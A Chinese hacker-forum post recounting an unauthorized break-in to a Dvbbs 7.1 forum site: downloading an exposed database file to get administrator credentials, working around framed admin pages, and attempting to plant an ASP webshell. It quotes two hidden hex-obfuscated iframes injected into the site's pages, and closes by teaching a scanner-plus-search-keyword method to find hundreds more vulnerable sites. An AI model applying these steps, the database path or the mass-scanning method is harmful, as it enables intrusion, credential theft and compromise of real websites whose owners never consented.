哎记曾经搞过的一个最让我郁闷的站

文章作者:呢喃公子
信息来源:[url]www.hackbase.com[/url]                                       
原始连接:[url]http://bbs.hackbase.com/viewthread.php?tid=3071443&extra=page%3D1
备注：分享出来希望不要笑我

看着这个站比较好看有种想要他风格的想法于是就开始搞起来，
默认admin
admin888 没戏， data/dvbbs7.mdb没戏
boke/data/dvboke.mdb  呵呵成功了
如图
[img]http://www.kill-v.com/yuanchuang/a.bmp[/img]
打开数据库先看下
[img]http://www.kill-v.com/yuanchuang/b.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/c.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/e.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/f.bmp[/img]
呵呵大家会说这么简单的下数据库然后再搞到管理员帐号着呢么会让我郁闷呢，接下来就告诉大家怎么个让我郁闷的方法
点击管理进入后台
[img]http://www.kill-v.com/yuanchuang/g.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/h.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/i.bmp[/img]
那那的，大家看到了么输入后台密码点机登陆的时候呢在网页下面出现俩个不相关的网址，而且进入后台后空空如也，难道我被人搞了[哎哭中]
回头想想既然都中招了那先看看原代码吧呵呵
[img]http://www.kill-v.com/yuanchuang/k.bmp[/img]

<iframe src=http://%7a%7a%7a%2e%39%39%33%33%31%31%2e%63%6f%6d/%6A%6A%6A/%69%6E%64%65%78%2E%68%74%6D width=0 height=0 frameborder=0></iframe>
<iframe src=http://%77%77%77%2E%6A%67%36%36%36%2E%6E%65%74/%77%6D/%69%6E%64%65%78%2E%68%74%6D%6C width=0 height=0 frameborder=0></iframe><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
我日明显两个加密的网页吗我太不性了
我们先给他还原用到这个工具
[img]http://www.kill-v.com/yuanchuang/o.bmp[/img]
[img]http://www.kill-v.com/yuanchuang/p.bmp[/img]
我靠:
[url]http://zzz.993311.com/jjj/index.htm[/url]

[url]http://www.jg666.net/wm/index.html[/url]
现在感觉他好象用框价隐藏了本来的页面但是不知道这两个网止有没有挂马，经过实验没有挂马[反正我感觉没有挂]
又没有马 他干吗弄这个页面呢，恩我来试下admin目录下面其他的页面试下
[img]http://www.kill-v.com/yuanchuang/r.bmp[/img]
经过多次实验终于知道了那个管理员把每个页面都弄个框架，让我们看不到以前的页面，呵呵这个怎么解决呢，因为采用了session[不知道是不是这么写]所以我本地修改一下 估计就可以了
我们先本地架设个洞网复制下后台原代码本地保存为htm页面然后修改里边地址

[img]http://www.kill-v.com/yuanchuang/s.bmp[/img]

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Frameset//EN"
     "http://www.w3.org/TR/xhtml1/DTD/xhtml1-frameset.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="content-type" content="text/html; charset=gb2312" />
<title>动网先锋论坛--控制面板</title>
<meta name="author" content="Dynamic Vanguard" />
<meta name="author's email" content="[email]eway@aspsky.net[/email]" />
<meta name="author's homepage" content="www.aspsky.net" />
</head>
<frameset rows="33,*">
<frame longdesc="" src="index.asp?action=admin_top" noresize="noresize" frameborder="0" name="ads" scrolling="no" marginwidth="0" marginheight="0" />
<frameset rows="675" cols="180,*">
<frame longdesc="" src="index.asp?action=admin_left" name="list" noresize="noresize" marginwidth="0" marginheight="0" frameborder="0" scrolling="yes" />
<frame longdesc="" src="index.asp?action=admin_main" name="main" marginwidth="0" marginheight="0" frameborder="0" scrolling="yes" />
</frameset>
<noframes><body></body></noframes>
</frameset>
</html>

src="后边都加上[url]http://www.kill-v.com/bbs/admin/[/url]
然后保存
最后点击这个保存后的页面呵呵看到了么
[img]http://www.kill-v.com/yuanchuang/t.bmp[/img]
，事实证明这样是可以滴还有很让我郁闷的是他每个页面都有上面那两个加密网址
到此结束本次入侵，呵呵因为这个站和我在一个服务器上我早试过了不知道我这个服务器上装的什么杀软 什么aspshell怎么加密都被杀 可能是我太菜了
顺便教大家用挖撅机来 找更多的站就是在里面添个boke/data/dvboke.mdb
然后关键字添上Powered By Dvbbs Version 7.1.0 Sp1
[img]http://www.kill-v.com/yuanchuang/u.bmp[/img]
呵呵看我出来一堆了检测3000多个站了就有200多个有洞，呵呵不泛比较大的站啊，只是一个小洞